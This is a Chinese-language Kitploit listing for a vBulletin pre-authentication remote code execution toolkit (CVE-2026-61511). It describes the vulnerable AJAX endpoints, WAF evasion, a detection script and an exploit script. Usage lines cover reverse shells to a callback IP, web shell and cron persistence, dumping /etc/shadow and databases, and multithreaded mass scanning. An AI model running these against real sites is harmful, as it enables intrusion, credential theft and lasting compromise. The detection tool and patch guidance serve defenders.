Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-61511-PoC-Exploit — CVE-2026-61511 – vBulletin 预认证远程代码执行(CVSS 9.8)。影响 5.x/6.x 版本(未修补)。通过端点池、AJAX、PHPFuck WAF 绕过实现多漏洞利用。完整工具包:反弹 Shell、代理、持久化、Webshell、数据库操作、防火墙控制、日志管理、批量扫描。2 个版本:多漏洞利用版与安全检测版。Python 3.8+ 请合理使用,遵守法律。🔒 | Kitploit
工具/GitHubGitHub/tc4dy/cve-2026-61511-poc-exploit
网络映射漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用WAF绕过渗透测试远程访问工具Payload 开发

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
数据库安全
GitHubtc4dy/cve-2026-61511-poc-exploit

CVE-2026-61511-PoC-Exploit

CVE-2026-61511 – vBulletin 预认证远程代码执行(CVSS 9.8)。影响 5.x/6.x 版本(未修补)。通过端点池、AJAX、PHPFuck WAF 绕过实现多漏洞利用。完整工具包:反弹 Shell、代理、持久化、Webshell、数据库操作、防火墙控制、日志管理、批量扫描。2 个版本:多漏洞利用版与安全检测版。Python 3.8+ 请合理使用,遵守法律。🔒

查看仓库
491个月前尚未审核

CVEPoC

CVE-2026-61511 – vBulletin 预认证 RCE 漏洞利用与验证工具

Python 3.8+ CVSS Author vBulletin

⚠️ 仅供道德使用 – 仅限授权安全测试
本仓库提供的工具仅限授权安全专业人员、蓝队和渗透测试人员使用。
未经授权访问计算机系统在 CFAA(美国)、Computer Misuse Act(英国)、TCK 243/244(土耳其)以及全球类似法律下均属违法行为。


📖 漏洞概述

CVE‑2026‑61511 是 vBulletin AJAX 模板渲染引擎中的一个 PHP eval() 注入漏洞。
受影响版本:5.0.0 – 5.7.5 和 6.0.0 – 6.2.1。

漏洞原理

  1. 多个攻击端点 – 该漏洞存在于多个 AJAX 处理器中:

    • /ajax/render/pagenav
    • /ajax/api/ad/replaceAdTemplate
    • /ajax/render/widget_php
    • /ajax/render/widget_tabbedcontainer_tab_panel
    • 各种 /ajax/api/content_* /getIndexableContent 端点
  2. PHPFuck 编码 – 载荷被转换为一系列 PHP 运算符和数字,可绕过 WAF 过滤器并允许执行任意 PHP 代码。

  3. 无需认证 – 攻击者可以向任意易受攻击的端点发送精心构造的 POST 请求,并以 Web 服务器的权限执行系统命令。

  4. 影响 – 服务器完全沦陷、数据窃取、后门植入、横向移动和持久化。请升级版本!

补丁

  • vBulletin 6.2.2 及旧版本的 Patch Level 1 修复了此问题。
  • 始终升级到最新版本。

🧰 工具

工具用途目标用户
exploit.py完整工具包,包含反弹 Shell、持久化、文件操作、数据库导出、防火墙管理、日志管理、端口转发、SSH 密钥部署、网络扫描和批量扫描(多线程)。红队 / 授权渗透测试人员
safecheck.py非侵入式验证器,在不执行任何恶意载荷的情况下检查漏洞。检测版本、测试所有端点并生成详细报告。蓝队 / 安全审计人员

📊 功能对比


🎯 使用场景摘要


⚙️ 安装

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-61511-PoC-Exploit
cd CVE-2026-61511-PoC-Exploit
pip install -r requirements.txt

requirements.txt 内容:

root@kitploit:~
request
urllib3

参数 🌬️

使用场景

端点池 🅿️

🛡️ 负责任使用

  • 仅对您拥有或已获得明确书面许可的系统使用这些工具。
  • 未经授权访问是非法且不道德的行为。
  • 作者对任何滥用行为不承担责任。
  • 始终遵守您所在国家的法律法规。

本软件仅用于教育和授权安全测试目的。

下载工具
功能exploit.pysafecheck.py
漏洞检测✅✅
版本检测✅✅
多端点测试(18 个路径)✅✅
命令执行✅❌
反弹 Shell✅❌
文件上传/下载✅❌
持久化机制✅❌
Web Shell 部署✅❌
数据库操作✅❌
系统信息收集✅✅
防火墙管理✅❌
日志管理✅❌
端口转发✅❌
SSH 密钥部署✅❌
网络扫描✅❌
批量扫描(多线程)✅❌
代理支持✅✅
JSON 报告输出✅✅
交互式菜单✅❌
非侵入式(安全)模式❌✅
Verbose/Debug 模式✅✅
自定义命令执行✅❌
多命令串联✅❌
远程文件读取✅❌
远程文件写入✅❌
系统用户管理✅❌
防火墙绕过技术✅❌
WAF 规避(PHPFuck)✅✅
场景推荐工具
蓝队 – 验证您的 vBulletin 安装是否存在漏洞safecheck.py
安全审计 – 非侵入式漏洞评估safecheck.py
红队 – 授权渗透测试并完整利用exploit.py
漏洞赏金 – 负责任披露测试safecheck.py
批量扫描 – 检查多个目标是否存在漏洞exploit.py(仅检测)
事件响应 – 检查系统是否已被入侵safecheck.py
参数描述
-t, --target目标 URL(例如 http://forum.com/vb)
--proxyHTTP 代理(例如 http://127.0.0.1:8080)
--timeout请求超时时间(秒,默认:10)
--retry每个路径的重试次数(默认:3)
--output将详细报告保存到 JSON 文件
-v, --verbose详细输出
-q, --quiet安静模式(最小化输出)
--lhost利用必需 – 回调 IP
--lport回调端口(默认:4444)
--threads批量扫描线程数(默认:5)
--exploit检测后执行利用
--full完整攻击(所有模块)
--shell启动反弹 Shell
--webshell安装 Web Shell(/shell.php)
--persist安装持久化(cron 任务)
--dump导出数据库
--dump-creds导出凭据(/etc/passwd、/etc/shadow)
--interactive验证成功后进入交互式菜单
#场景命令
1快速漏洞检查python safecheck.py -t http://target.com/vb
2详细扫描并生成报告python safecheck.py -t http://target.com/vb --output report.json -v
3反弹 Shellpython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --lport 4444 --shell
4完整攻击(所有模块)python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --full
5从文件批量扫描python exploit.py -l targets.txt --lhost 192.168.1.100 --threads 20 --output results.json
6交互式菜单模式python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --interactive
#端点
1/ajax/render/pagenav
2/ajax/render/pagenav?template=page
3/ajax/api/ad/replaceAdTemplate
4/ajax/render/widget_php
5/ajax/render/widget_tabbedcontainer_tab_panel
6/ajax/api/content_infraction/getIndexableContent
7/ajax/api/content_video/getIndexableContent
8/ajax/api/content_text/getIndexableContent
9/ajax/api/content_report/getIndexableContent
10/ajax/api/content_redirect/getIndexableContent
11/ajax/api/content_privatemessage/getIndexableContent
12/ajax/api/content_poll/getIndexableContent
13/ajax/api/content_photo/getIndexableContent
14/ajax/api/content_link/getIndexableContent
15/ajax/api/content_gallery/getIndexableContent
16/ajax/api/content_event/getIndexableContent
17/ajax/api/content_channel/getIndexableContent
18/ajax/api/content_attach/getIndexableContent